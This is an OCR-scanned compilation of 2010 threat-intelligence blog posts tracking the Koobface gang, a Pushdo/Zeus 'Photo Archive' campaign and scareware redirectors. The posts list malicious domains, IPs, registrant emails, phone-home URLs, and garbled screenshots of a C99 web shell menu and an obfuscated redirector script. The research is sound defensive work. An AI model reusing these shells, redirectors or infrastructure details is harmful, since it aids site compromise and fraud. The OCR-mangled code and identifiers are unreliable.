ttps://zeustracker.abuse.ch/monitor.php?host=ubojnajasila.net 


17. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 
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6.2.3 How the Koobface Gang Monetizes Mac OS X Traffic (2010-02-02 18:07) 


Mac users appear to have a special place in the heart of the Koobface gang, since they’ve 
recently started experimenting with a monetization strategy especially for them - by compro- 
mising legitimate sites for the sole purpose of embedding them with the popular PHP backdoor 
shell C99 (Synsta mod), in an attempt to redirect all the Mac OS X traffic to affiliate dating 
programs, such as for instance [1]AdultFriendFinder. 


pme] [Search] [@effer] [Encoder] [Toots] [Pr > Brute Forcer rity Information ]} [SQL Manag ger] [Eval PHP code) [Self remeve] [Cpanel Logs) 


Ftp Quéck brute 
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The use of Synsta’s C99 mod is not a novel approach, the gang has been using for over an 
year and a half now. The original KROTEG injected script, is now including a "hey rogazi" 
message. "Hey rogazi" appears to be some kind of slang word (rogatstsi) for scooter driving 
Italian people. What’s also interesting to point out is that the Mac OS X redirection takes place 
through one of the few currently active centralized IPs from Koobface 1.0’s infrastructure - 
61.235.117.83. 


c99 v0.0.1 SYN-MOD [SYNSTA] 


11 OpenSSt/0.9.26-fips wh _p mod_bwlimited/ 1.4 FreetPage/5.0.2.2635. PHP/S.2.9 
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This very same IP (profiled in [2]August, 2009 and then in [3]September, 2009) was once 
brought offline thanks to the folks at China CERT, but quickly resumed operation, with Koob- 
face 1.0’s "leftovers" xtsd20090815 .com and kiano-180809 .com (domain was [4]serving 
client-side exploits in November 2009’s experiment by the Koobfae gang, followed by another 
one again hosted at 61.235.117.83) still parked there. 


¢ Go through related web shell backdoors, monetization posts: [5]A Compilation of Web 
Backdoors; [6]Monetizing Web Site Defacements; [7]Underground Multitasking in Action; 
[8]Monetizing Compromised Web Sites, [9]Web Site Defacement Groups Going Phishing 
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Moreover, this China-based IP (it even has a modest [10]Alexa pagerank) was also the 
centralized redirection point in Koobface 1.0’s scareware business model using popup.php to 
redirect to a systematically updated portfolio of scareware domains, and the first time ever 
that | came across to what [11]the gang is now publicly acknowledging as the "2008 ali baba 
and 40, LLC" team. 


[12]AS9394 (CRNET) itself is currently hosting the following active Zeus crimeware campaigns: 
[13]6alava .com - 61.235.117.70 - Email: necks@corporatemail.ru 
[14]sicha-linna .com - 61.235.117.77 - Email: stay@bigmailbox.ru 
[15]stopspaming .com - 61.235.117.70 - Email: bunco@e2mail.ru 


[16]ubojnajasila .net - 61.235.117.87 - Email: ubojnajasila.net@contactprivacy.com 


Here’s how the experiment looks like in its current form. Once the OS is detected, the 
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redirection takes place through 61.235.117.83 /mac.php -> 61.235.117.83 /vvv.htm loading 
the following pages, using the gang’s unique campaign IDs at AdultFriendFinder: 


- BestDatingDirect .com/page hot.php?page=random &did=14029 
- adultfriendfinder .com/go/page/ad _ffadult gonzo?pid=p291351.sub2w954 &lang=english 


- adultfriendfinder .com/go/page/landing page _geobanner?pid=g227362-ppc 


bestdatingdirectcom 
bestnetdate. com 
currentdating.com 
datefunclub.com 

enormousdating.com 


giantdating.com 
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worldbestdate.com 63-218.226.67. static pecwglobal.net 


worlddatinghere.com 
www bestdatingdirectcom 

www. datefunclub.com 
www.enormousdating.com 

wwew.giantdating.com 


www.worlddatinghere.com 


Parked on 63.218.226.67 - AS3491; PCCWGlobal-ASN PCCW Global is the rest of the dating 
site redirectors: 


bestdatingdirect .com 
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bestnetdate .com 
currentdating .com 
datefunclub .com 
enormousdating .com 
giantdating .com 
onlinelovedating .com 
worldbestdate .com 


worlddatinghere .com 


This isn’t the first time that the Koobface gang is attempting to monetize traffic through 
dating affiliate networks. In fact, in November’s "[17]Koobface Botnet’s Scareware Business 
Model - Part Two" post emphasizing on the gang’s connection with blackhat SEO campaigns, 
the Bahama botnet and the [18]malvertising attacks at the web site of the New York Times, | 
also [19]pointed out on their connection with an [20]Ukrainian dating scam agency profiled 
before, whose botnet was also linked to [21]money mule recruitment campaigns in May, 2009. 


[22]An excerpt is worth a thousand words: 


The historical OSINT paragraph mentioned that several of the scareware domains pushed 
during the past two weeks were responding to 62.90.136.237. This very same 
62.90.136.207 IP was hosting domains part of an [23]Ukrainian dating scam agency known as 
[24]Confidential Connections earlier this year, whose spamming operations were linked to a 
[25]botnet involved in money mule recruitment activities. 
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For the time being, the following dating scam domains are responding to the same IP: 
healthe-lovesite .com - Email: potenciallio@safe-mail.net 

love-isaclick .com - Email: potenciallio@safe-mail.net 

love-is-special .com - Email: potenciallio@safe-mail.net 

only-loveall .com - Email: potenciallio@safe-mail.net 

and-i-loveyoutoo .com - Email: potenciallio@safe-mail.net 

andiloveyoutoo .com - Email: menorstl0@yahoo.com 

romantic-love-forever .com - Email: potenciallio@safe-mail.net 

love-youloves .com - Email: potenciallio@safe-mail.net 

love-galaxys .com - Email: potenciallio@safe-mail.net 


love-formeandyou .com - Email: potenciallio@safe-mail.net 
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ifound-thelove .net - Email: potenciallio@safe-mail.net 
findloveon .net - Email: wersers@yahoo.com 


love-isexcellent .net - Email: potenciallio@safe-mail.net 


Could it get even more malicious and fraudulent than that? Appreciate my rhetoric. The 
same email (potenciallio@safe-mail.net) that was used to register the dating scam domains 
was also [26]used to register exploit serving domains at 195.88.190.247, [27]participate 
in phishing campaigns, and register a [28]money mule recruitment site for the non-existent 
[29]Allied Insurance LLC. (Allied Group, Inc.). 


Of course, the money made in process looks like pocket change compared to the money 
they gang makes through blackhat SEO, click fraud and scareware in general - go through 
the related posts at the bottom of the article. But since they’ve previously indicated what | 
originally anticipated they’ll do sooner or later, namely, start diversifying and experimenting 
due to the ever-growing compromised infrastructure, what they’ll do next on the Mac front is 
an issue worth keeping an eye on. 


Related Koobface gang/botnet research: 

[30]The Koobface Gang Wishes the Industry "Happy Holidays" 
[31]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[32]Koobface Botnet Starts Serving Client-Side Exploits 

[33]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[34]Koobface Botnet’s Scareware Business Model - Part Two 
[35]Koobface Botnet’s Scareware Business Model - Part One 
[36]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[37]New Koobface campaign spoofs Adobe’s Flash updater 
[38]Social engineering tactics of the Koobface botnet 

[39]Koobface Botnet Dissected in a TrendMicro Report 


[40]Movement on the Koobface Front - Part Two 
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[41]Movement on the Koobface Front 
[42]Koobface - Come Out, Come Out, Wherever You Are 


[43]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [44]Dancho Danchev’s blog. Follow him [45]on Twitter. 
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6.2.4 PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
(2010-02-03 22:42) 


ml smlne="het +02@/ 2990/xhtrl"><head> 
ceeta http-equiy Type” content="cext/html: charset-UTF-8"> 
<title>Photos Ar losting - Archive @ 
<Link rel*"STYLESHEET* type**text/cas" hreft-" 


" framebeorder*"0" 


<div olass*"head" 
@iv clase- 
<div class-"1 
<@iv class*"menus"> 

‘al Clase*"menu"><Li><img sro*"marker.gif" border="0* height+"8" width="1i"><a href«* javascript: +20void (addBookwark() +20! | \20alerct (' Yours 20browsert20 


‘img sro*"spacer.git”™ class="logo i” height«"i02" width="457"></div 


<hi>Photo Archive #2070735 </hi> 

<p Clase*"desc™>vas added by Anonymous on Bon Feb Olat, 2010 OS:27 pe.</p> 
</oenter> 

</div> 

<br class*"clearfioat*> 

</div> 


Pushdo/Cutwail’s customers, or perhaps the botnet masters themselves, continue rotating the 
malware campaigns, with the very latest one using a "Photo Archive #2070735" theme, and 
continuing to server client-side exploits hosted within crimeware-friendly networks it’s time 
we profile and expose. 


e [1]Extensive list of the domains/subdomains involved at Gary Warner’s blog. 
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* ADO TO FAVORITES 


Photo Archive @2070735 was added by Anonymous on Mon Feb Otst, 2020 05:27 pm 


Archive #2070735 
PhotoArchwe.exe | 13005 


oa 


© 7007-2007, Photos Archiwes Hosting Grow, Inc. @ - ALL RIGHTS RESERVED. 


Photo Archives Hosting describes itself as: 

"Photos Archives Hosting has a zero-tolerance policy against ILLEGAL content. All archives 
and links are provided by 3rd parties. We have no control over the content of these pages. 
We take no responsibility for the content on any website which we link to, please use your 
own discretion while surfing the links. © 2007-2009, Photos Archives Hosting Group, Inc.- ALL 


RIGHTS RESERVED." 


- Sample URL: photoshock.MalwareDomain/id1073bv/get.php?email= 

- Sample iFrame from this week’s campaign: 109.95.115.36 /usasp22/in.php 

-[2] Sample iFrame from last week: 109.95.114 .251 /usO1d/; 109.95.115.36 /usasp/in.php 
-[3] Sample iFrame used two weeks ago: 109.95.114 .251/uks1/in.php 

- Detection rate: PhotoArchive.exe ([4]Trojan-Spy.Win32.Zbot); dropped file.exe ([5]Trojan- 


Spy.Win32.Zbot) 
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nsl.androzo.ru 


nsL.elnasa.ru 
nsl.nekovo,ru 


nsL.recessa.ru 193.104.41.130 —NET_» 193.104.41.0/24 ——AS-ge As4g934 


nsl.recrush,ru 
nsl.stomaid.ru 


ns1.trust-service.cn 


Upon execution, it drops C:\WINDOWS\system32\sdra64.exe; C:\WINDOWS\system32\lowseckslashus 
and phones back to the [6]Zeus-crimeware serving: horosta .ru/cbd/nekovo.bri ; horosta 
.ru/ip.php - 109.95.115.19 Email: bernardo _pr@inbox.ru 


Who's offering the hosting infrastructure for the actual domains/malware binaries and 
nameservers? 

- [7]AS50215 (TROYAK-AS Starchenko Roman Fedorovich) - [8]profiled here 

- [9]109.95.112.0/22 - [10]AS50369 - VISHCLUB-as Kanyovskiy Andriy Yuriyovich 

- 193.104.41.0/24 - [11]AS49934 - VVPN-AS PE Voronov Evgen Sergiyovich 

- [12]91.200.164.0/22 - [13]AS47560 - VESTEH-NET-as Vesteh LLC 


What’s worth pointing out is that "TROYAK-AS Starchenko Roman Fedorovich" is position- 
ing itself as [14]Ethernet,home,LAN,net,provider,ISP,Homenet provider at [15]ctlan.net. Just 
like the "[16]Fake Web Hosting Provider - Front-end to Scareware Blackhat SEO Campaign at 
Blogspot" and "[17]GazTranzitStroylnfo - a Fake Russian Gas Company Facilitating Cybercrime" 


All of the involved domains have already been blacklisted by the Zeus Tracker. However, with 
the campaigners at large, what’s TROYAK-AS today, will be yet another cybecrime-friendly AS 
tomorrow. 


Related posts: 

[18]Facebook/AOL Update Tool Spam Campaign Serving Crimeware and Client-Side Exploits 
[19]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 

[20]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 

[21]Pushdo Injecting Bogus Swine Flu Vaccine 

[22]"Your mailbox has been deactivated" Spam Campaign Serving Crimeware 

[23]Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[24]The Multitasking Fast-Flux Botnet that Wants to Bank With You 


This post has been reproduced from [25]Dancho Danchev’s blog. Follow him [26]on Twitter. 


1. http://garwarner . blogspot .com/2010/02/minipost-fake-photo-zeus.htm 
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2. http: //ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 

3. http: //ddanchev. blogspot .com/2010/01/facebookaol-update-tool-spam- campaign. htm 

4 ttp://www.virustotal.com/analisis/04aef82e6036c97c1287dec5f£8789384b3ab539210750f 262b4d47 15835c37c5- 12652 
24596 


Ds ttp://www.virustotal.com/analisis/a05cc494a906a791f9b395b16bcc82c9e8f 1dd1a4c212aab33386df b47e53c5e- 12652 


Be 


6. https: //zeustracker.abuse.ch/monitor.php?host=horosta.r 

7. https: //zeustracker. abuse. ch/monitor . php?as=50216 

8. http: //ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 
9. http: //safebrowsing.clients.google.com/safebrowsing/diagnostic?site=AS : 50369 


10. https://zeustracker.abuse.ch/monitor . php?as=50369 
11. https://zeustracker.abuse.ch/monitor . php?as=49934 


. http: //google.com/safebrowsing/diagnostic?site=AS : 47560 


13. 
14. 
15, 


16. http: //ddanchev.blogspot .com/2009/06/fake-web-hosting-provider-front-end-to.html 


17. http://ddanchev.blogspot.com/2009/05/gaztranzitstroyinfo-fake-russian-gas .htm 
18. http: //ddanchev.blogspot .com/2010/01/facebookaol-update-tool-spam-campaign.htm 


19. http: //ddanchev. blogspot .com/2010/01/pushdo-serving-crimeware-client-side.htm 


20. http: //ddanchev. blogspot .com/2010/01/outlook-web-access-themed-spam- campaign. htm 


21. http://ddanchev. blogspot .com/2009/12/pushdo-injecting-bogus-swine-flu.htm 


22. 
23. http: //ddanchev. blogspot. com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.htm 
24, 

25. 

26. 
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6.2.5 A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the 
Koobface Gang (2010-02-04 00:50) 


<script>([Li 

// KROTEG! 

var a0cScS2 = [ 

("fdaicdge lbonnopqqdk.nllpceplojdpm".replace {(/ [diqlnp}j)+/g,""),'fb2'], (18) 
["tkpabfgpbgqnrerd.bkrcknomkh".replace({/[kpbfqnrh] +/q,""),'to'], 

("flgr ibabegngkdhjabsbbtaelrkk.bhgchombb". replace (/[lgbakh})+/g,""),'fr'), (1! 
["mrdkjyisfdjdphgfabrcbfeil. lejonqmdaj”.replace ({/[(rdkjfhgbilna] +/g,""),'ms'], 
("masqpqlfiaqnakdbsb.qjcgofemgh".replace(/ [aqtdbjgeh)+/g,""),'ms'), 
["ljjnkb.jipemousb". replace (/[jbipcou] +/g,""),'ms'], 
("mlpygitfyfgnefqqanqrnjbpfoloiikji.ngjdcjfoqhma”. replace (/{ipgjfnqidh)+/g,""),'yb'], 
("fpiudkblanhirg. pikickhoqlm"”.replace(/[pidklnhgq] +/g,""),'fu'], 
["talvihtgtgedbrdp.bcenaqoamgtk".replace (/[alhgdbpnqfk] +/g,""),'tw'j, 

("hj inbfSe.npscgnogugmjj".replace (/ [jnbfepsgu] +/g,""),'hiS'],! 
("bpiedukbugioruhh.klcftnonlfpmhna".replace(/[pidukgrhlftna] +/g,""),'be'] 
) 7 CLF) 

var bidf81i4 = [ 

Yer.” + “205.216. 97", o 

'86.7' + '4.167.16', 

'216' + '.240.243.14', 

(640 i0 + "990175 225", 

Msi breal te Ueda lets 

'211S.' + '42.68.143',0 

Wer deyag cs Uh lal Arar line 

'67.64.' + '119.34', 

'96.' + '251.116.110', oO 

'109" + '.65.36.143', (1! 

'77.106.' + '155.218', 

'99," + '166.73.29', 

NOG rautine ese) eka Oe ary 

199)! 4) OF BOLilee!, k 

'8S.67.' + '19.204', 

Se 4: 6d og 2 

'S6.1' + '12.14.239', (LF) 

Wi bec cts Urata eden Wt: intl 

'68.80' + '.233.49', 

'97.96' + '.232.201', [11 

) 7 cL! 


With [1]scareware/rogueware/fake security software continuing to be the cash-cow choice for 
the Koobface gang, keeping them on a short leash in order to become the biggest [2]opportu- 
nity cost for the gang’s business model is crucial. The following are currently active blackhat 
SEO redirectors/Koobface-infected hosts redirectors and actual scareware domains courtesy 
of the gang. 
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tral 
LABEL_COOEC 
head> 
title>Loadings/ title 
meta names"robots” content+"noindex, nofollow, noarchive” 
woript 


function handleError |) (try( widow. parent. location= location: ) catch (e) () tey(wisdow. top. lceation= location: )catch(e} ()} window. onerror*handleError: tf (window 


/eoript 


} ext 
nu 
ov (danger Vindsde 
ry ; @lee vindow.addiventLiat 
} 
script 
script type="text/ javascript ">docwent.urite ('<OBJ"+' ECT ad@"a'+' se" width="0" height="0" style="position:absolute; left:O;top:07" CLAS" +'SID@"CL3' +" TI 
script Language="javasceipt">AC_FL_ RusContent = 0:</secript 
wcript languages" jevarc 


Sion. indexOr (“ESIE") '= -1 ? true 1 false: 


#ion.toLowerCase().indexOf("win") ‘= <2) ? true : false; 


var = (navigator. 


-UperAgent.indexOt("Opera™) ‘= -2) ? true : false: 


Blackhat SEO redirectors, also embedded at Koobface-infected hosts, with identical redirector 
ID (?pid=312s02 &sid=4db12f): 

fordusedsales .com - 193.104.106.250 - Email: test@now.net.cn 
buylexuscustoms .com - 91.212.226.185 - Email: test@now.net.cn 
tracegirlsonline .com - 89.248.168.22 - Email: test@now.net.cn 
skypetollfree .com - 96.44.128.245 - Email: test@now.net.cn 
dendy-trens .com - Email: test@now.net.cn 

pretendtolove .com - Email: test@now.net.cn 

bewareoffreebies .com - Email: test@now.net.cn 
harry-the-potter .com - Email: test@now.net.cn 
getlancomediscount .com - Email: baldwinnere@yahoo.co.uk 
vincentvangoghsite .com - Email: contacts@ferra.hu 
jacksonpollocksite .com - Email: contacts@ferra.hu 

lady2gaga .com - Email: contacts@designt.de 
nigeriaworldtours .com Email: info@montever.de 
americanpiemusicvideo .com - Email: mail@suvtrip.hu 
superstitionmusicvideo .com - Email: mail@suvtrip.hu 
umbrellamusicvideo .com - Email: mail@suvtrip.hu 
discounts-org .com - Email: mail@haselbladtour.com 
littlediscounts .com - Email: mail@haselbladtour.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
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chevroletwmodelteys.com 
delhiwebcameracom A 
discounts-org.com 
discounts22.com 
global-d-securitycom 
jacksonpollocksite.com 
lexusbestparts.com 
max6antispyware.com 


megal-scannercom 
A 96.44.128.0/18 ——“S-ge 4522298 


. ul 
mega2-scannercom 4 96.44.128.245 “ 


mega4-scannercom 


hosted.by.qudranetcom 


mega6-scannercom 
mega?-scannercom 
microantivirus-scanner0.com 
microantirusscannerl.com 
microanthitusscanner2.com 
pro-2inl-securityh.com 
spy-detectoracom 


Z3-antispyware.com 


chevroletvmodeltoys .com - Email: CourtneyRWebb@aol.com 
volvomodeltoys .com - Email: CourtheyRWebb@aol.com 
manilawebcamera .com - Email: monkey22@live.com 
mumbaiwebcamera .com - Email: monkey22@live.com 
karachiwebcamera .com - Email: monkey22@live.com 
delhiwebcamera .com - Email: monkey22@live.com 
istanbulwebcamera .com - Email: monkey22@live.com 
lexusmodeltoys .com - Email: monkey22@live.com 
chevroletvmodeltoys .com - Email: CourtneyRWebb@aol.com 
bmwmodeltoys .com - Email: CourtneyRWebb@aol.com 


Upon redirection, the scareware is served from malware-b-scan .com - 96.44.128.245; 
91.212.226.97; 91.212.226.185; 91.121.45.67, 91.212.226.203, 94.228.209.195 - Email: 
mail@bristonnews.com. 
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Sample detection rate for newly introduced scareware samples: [3]Setup _312s2.exe - 
Result: 3/40 (7.5 %), [4]Setup _312s2.exe - Result: 4/39, [5]Setup _312s22.exe - Result: 2/39 
(5.13 %), [6]Setup _312s2.exe - Result: 6/39 (15.39 %), [7]Setup _312s2.exe - Result: 1/40 
(2.5 %), [8]Setup _312s2.exe - Result: 1/39 (2.56 %), [9]Setup _312s2.exe - Result: 3/39 (7.7 
%). [10]Setup _312s2.exe - Result: 4/40 (10 %), [11]Setup _312s2.exe - Result: 1/40 (2.5 %), 
[12]Setup _312s2.exe - Result: 4/40 (10 %), [13]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[14]Setup 312s2.exe - Result: 5/41 (12.2 %), [15]Setup _312s2.exe - Result: 5/41 (12.2 %), 
[16]Setup 312s2.exe - Result: 4/41 (9.76 %), [17]Setup _312s2.exe - Result: 4/41 (9.76 %), 
[18]Setup 312s2.exe - Result: 5/41 (12.2 %), [19]Setup _312s2.exe - Result: 4/41 (9.76 %), 
[20]Setup 312s2.exe - Result: 3/41 (7.32 %), [21]Setup _312s2.exe - Result: 6/41 (14.63 %). 


Upon execution the sample phones back to winxp7server .com/download/winlogo.bmp 
- 94.228.208.57; rescuesysupdate .com/?b=312s2 - 83.133.125.216. The most recent 
samples (Wednesday, February 10, 2010) phone back to wintimeserver .com/?b=312s2 - 
91.212.226.125 and firmwaredownloadserver .com/download/winlogo.obmp - 94.228.208.57. 
The most recent samples (Sunday, February 21, 2010) phone back to firmwaredown- 
loadserver.com /download/winlogo.bmp - 94.228.208.57; = shifustserver.com /down- 
load/winlogo.bmp - 94.228.208.5/94.228.208.57 - Email: viinzer@hotmail.com 


The most recent samples (Friday, February 12, 2010) phone back to firmwaredownload- 


server .com/download/winlogo.bmp - 94.228.208.57; checklatestversion .com/?b=312s - 
109.232.225.75 
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antispywareOGscan.com 
artspywareirto9.com 
antivirus -for-pe-2.com 
antivirus for pc-4.com A 
antivirus-for-pc-6.com 
antivirus for pe-B.com 
antvirusproBscan.com 
@@ra-antiirus-scani.com 
extra-security-scanbl com 
fun-antiitusscand.com 
fun-antiresscani com 4 
Er 91.212226209 > MET pe 912.212.226.024 ——AL-g Asser? 
fun-anthirusscan3.com a 
fun-antresscans com 
fun-antiirusscans.com 4, 
funantveusscand.com 
funantveusscand.com 
runantveusscan4.com 
funantveusscand.com 
securepro-antivirusi.com 
super-scanner-2004.com 
top ratearuivirus0.com 


topantimalware-scanner7.com 


Parked on the same IPs are more scareware domains part of the portfolio: 
195.5.161.107/psx1/?vih==RANDOM _STRINGS - no domain name 
91.212.132.241 /psx1/?vih==RANDOM _STRINGS 

195.5.161.105 /psx1/?vih==RANDOM STRINGS 
non-antivirus-scan .com - Email: test@now.net.cn 
zin-antivirus-scan .com - Email: test@now.net.cn 
nextgen-scannert .com - Email: test@now.net.cn 
protection15scan .com - Email: test@now.net.cn 
nitro-antispyware .com - Email: test@now.net.cn 

z2-antispyware .com - Email: test@now.net.cn 

spy-detectore .com - Email: admin@clossingt.com 

dis7-antivirus .com - Email: admin@vertigosmart.com 
v2comp-scanner .com - Email: admin@vertigosmart.com 
new-av-scannere .com - Email: missbarlingmail@aol.com 
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smartvirus-scan6 .com - Email: info@terranova.com 
spywaremaxscan4 .com - Email: out@trialzoom.com 
super6antispyware .com - Email: mail@ordercom.com 
spyware-max-scan3 .com - Email: out@trialzoom.com 
max-antivirus-security5 .com - Email: mail@dynadoter.com 
winterdiscounts5 .com - Email: mail@haselbladtour.com 
11-antivirus .com - Email: call555call@live.com 
l-antivirus .com - Email: call555call@live.com 
1m-online-scanner .com - Email: stellar2@yahoo.com 
2m-online-scanner .com - Email: stellar2@yahoo.com 
2pro-antispyware .com - Email: mail@yahoo.com 
3pro-antispyware .com - Email: mail@yahoo.com 
6-antivirus .com - Email: call555call@live.com 
7-antivirus .com - Email: call555call@live.com 
9-antivirus .com - Email: call555call@live.com 
a0-online-scanner .com - Email: stellar2@yahoo.com 
a9-online-scanner .com - Email: stellar2@yahoo.com 
aa-antivirus .com - Email: call555call@live.com 
aa-online-scanner .com - Email: call555call@live.com 
ab-antivirus .com - Email: call555call@live.com 
ac-antivirus .com - Email: call555call@live.com 
ad-antivirus .com - Email: call555call@live.com 
adv1-system-scanner .com - Email: JayRKibbe@live.com 
adv2-system-scanner .com - Email: JayRKibbe@live.com 
ae-antivirus .com - Email: call555call@live.com 
antivirus-expert-a .com - Email: 900ekony@live.com 
antivirus-expert-i .com - Email: 900ekony@live.com 
antivirus-expert-r .com - Email: 900ekony@live.com 
antivirus-expert-y .com - Email: 900ekony@live.com 
antivirussystemscan1 .com - Email: 900ekony@live.com 
antivirussystemscana .com - Email: 900ekony@live.com 
army-antispywarea .com - Email: beliec99@yahoo.com 
army-antispywarei .com - Email: beliec99@yahoo.com 
army-antispywarel .com - Email: beliec99@yahoo.com 
army-antispywarep .com - Email: beliec99@yahoo.com 
army-antivirusa .com - Email: beliec99@yahoo.com 
army-antivirusd .com - Email: beliec99@yahoo.com 
army-antivirust .com - Email: beliec99@yahoo.com 
army-antivirusv .com - Email: beliec99@yahoo.com 
army-antivirusy .com - Email: beliec99@yahoo.com 


b1-online-scanner .com - Email: stellar2@yahoo.com 
best-antiviruskO .com 

bestpd-virusscanner .com - Email: SusanCWagner@yahoo.com 
bestpr-virusscanner .com - Email: SusanCWagner@yahoo.com 
crystal-antimalware .com - Email: mail@vertigocats.com 
crystal-antivirus .com - Email: mail@vertigocats.com 
crystal-pro-scan .com - Email: mail@vertigocats.com 
crystal-pro-scanner .com - Email: mail@vertigocats.com 
crystal-spyscanner .com - Email: mail@vertigocats.com 
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crystal-threatscanner .com - Email: mail@vertigocats.com 
crystal-virusscanner .com - Email: mail@vertigocats.com 
extra-spyware-defencea .com - Email: fabula8@live.com 
extra-spyware-defenceb .com - Email: fabula8@live.com 
malware-a-scan .com - Email: mail@bristonnews.com 
malware-b-scan .com - Email: mail@bristonnews.com 
malware-c-scan .com - Email: mail@bristonnews.com 
malware-d-scan .com - Email: mail@bristonnews.com 
malware-t-scan .com - Email: mail@bristonnews.com 
mega-antispywarea .com - Email: fabula8@live.com 
mega-antispywareb .com - Email: fabula8@live.com 
mm-online-scanner .com - Email: stellar2@yahoo.com 
my-computer-antivirusa .com - Email: dillinzer1@yahoo.com 
my-computer-antivirusb .com - Email: dillinzer1@yahoo.com 
my-computer-antiviruse .com - Email: dillinzer1@yahoo.com 
my-computer-antivirusq .com - Email: dillinzerl1@yahoo.com 
my-computer-antivirusw .com - Email: dillinzer1@yahoo.com 
my-computer-scanc .com - Email: clintommail2@yahoo.com 
my-computer-scane .com - Email: clintommail2@yahoo.com 
my-computer-scanl .com - Email: clintommail2@yahoo.com 


my-computer-scannera .com - Email: clintommail2@yahoo.com 


my-computer-scannerl .com - Email: clintommail2@yahoo.com 


my-computer-scannerm .com - Email: clintommail2@yahoo.com 
my-computer-scannern .com - Email: clintommail2@yahoo.com 
my-computer-scannerv .com - Email: clintommail2@yahoo.com 


my-computer-scanw .com - Email: clintommail2@yahoo.com 
my-pc-online-scanm .com - Email: dillinzerL@yahoo.com 
my-pc-online-scann .com - Email: dillinzerL@yahoo.com 
my-pc-online-scanr .com - Email: dillinzerL@yahoo.com 
my-pc-online-scanv .com - Email: dillinzerl1@yahoo.com 
nl-system-scanner .com - Email: JayRKibbe@live.com 
n2-system-scanner .com - Email: JayRKibbe@live.com 
nasa-antivirusl .com - Email: call555call@live.com 
nasa-antivirus3 .com - Email: call555call@live.com 
nasa-antivirusa .com - Email: call555call@live.com 
nasa-antivirusb .com - Email: call555call@live.com 
nasa-antiviruso .com - Email: call555call@live.com 
pcl-system-scanner .com - Email: JayRKibbe@live.com 
pc2-system-scanner .com - Email: JayRKibbe@live.com 
proO-antivirus .com - Email: mail@yahoo.com 
proO-system-scanner .com - Email: JayRKibbe@live.com 
prol-system-scanner .com - Email: JayRKibbe@live.com 
pro2-antivirus .com - Email: mail@yahoo.com 

pro4-antivirus .com - Email: mail@yahoo.com 

pro6-antivirus .com - Email: mail@yahoo.com 

pro8-antivirus .com - Email: mail@yahoo.com 
remote-antispywarec .com - Email: teresa2mail.me@live.com 
remote-antispywared .com - Email: teresa2mail.me@live.com 
remote-antispywaree .com - Email: teresa2mail.me@live.com 
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remote-antispywarey .com - Email: teresa2mail.me@live.com 
remote-pcl-scanner .com - Email: teresa2mail.me@live.com 
remote-pc-scannera .com - Email: teresa2mail.me@live.com 
remote-pc-scannerr .com - Email: teresa2mail.me@live.com 
remote-pc-scannerv .com - Email: teresa2mail.me@live.com 
remote-pc-scannery .com - Email: teresa2mail.me@live.com 


run-antivirusscan0.com 


run-antivirusscanl,com 
run-antivirusscan3.com 
run-antivirusscan6.com 


run-antivirusscan8.com 
94.228.208.0/20 ——4S-pe As47869 


94.228.209.195 


runantivirusscan0.com 
runantivirusscan3.com 
runantivirusscan4.com 
runantivirusscan9.com 


securepro-antivirus1.com 


scan3antispyware .com - Email: o@mozzilastuf.com 
scan6antispyware .com - Email: o@mozzilastuf.com 
scan8antispyware .com - Email: o@mozzilastuf.com 
scan-antispywarea .com - Email: o@mozzilastuf.com 
scan-antispywarec .com - Email: o@mozzilastuf.com 
scan-antispywared .com - Email: o@mozzilastuf.com 
scan-antispywarez .com - Email: o@mozzilastuf.com 
spyware-01-scanner .com - Email: mail@bristonnews.com 
spyware-03-scanner .com - Email: mail@bristonnews.com 
spyware-05-scanner .com - Email: mail@bristonnews.com 
spyware-06-scanner .com - Email: mail@bristonnews.com 
spyware-07-scanner .com - Email: mail@bristonnews.com 
stcanning-your-computerc .com - Email: mitra66@yahoo.com 
stcanning-your-computerd .com - Email: mitra66@yahoo.com 
stcanning-your-computerq .com - Email: mitra66@yahoo.com 
stcanning-your-computerr .com - Email: mitra66@yahoo.com 
stcanning-your-computert .com - Email: mitra66@yahoo.com 


3028 


stcanning-your-pca .com - Email: mitra66@yahoo.com 
stcanning-your-pcb .com - Email: mitra6b6@yahoo.com 
stcanning-your-pcc .com - Email: mitra66@yahoo.com 
stcanning-your-pcd .com - Email: mitra66@yahoo.com 
stcanning-your-pce .com - Email: mitra66@yahoo.com 


stealthv1-antispyware 
stealthv2-antispyware 
stealthv7-antispyware 
stealthv8-antispyware 
stealthv9-antispyware 


.com - Email: SteveLCartwright@yahoo.com 
.com - Email: SteveLCartwright@yahoo.com 
:com - Email: SteveLCartwright@yahoo.com 
.com - Email: SteveLCartwright@yahoo.com 
.com - Email: SteveLCartwright@yahoo.com 


verl-system-scanner .com - Email: JayRKibbe@live.com 
ver2-system-scanner .com - Email: JayRKibbe@live.com 


virus-al-scanner .com - 
virus-al-scanner .com - 
virus-b1-scanner .com - 
virus-b1-scanner .com - 
virus-cl-scanner .com - 
virus-cl-scanner .com - 
virus-d1-scanner .com - 
virus-d1-scanner .com - 
virus-e2-scanner .com - 
virus-e2-scanner .com - 


Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 
Email: mail@bristonnews.com 


windowsv5-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv6-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv7-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv8-antispyware .com - Email: SteveLCartwright@yahoo.com 
windowsv9-antispyware .com - Email: SteveLCartwright@yahoo.com 
z0-online-scanner .com - Email: stellar2@yahoo.com 

z1-online-scanner .com - Email: stellar2@yahoo.com 
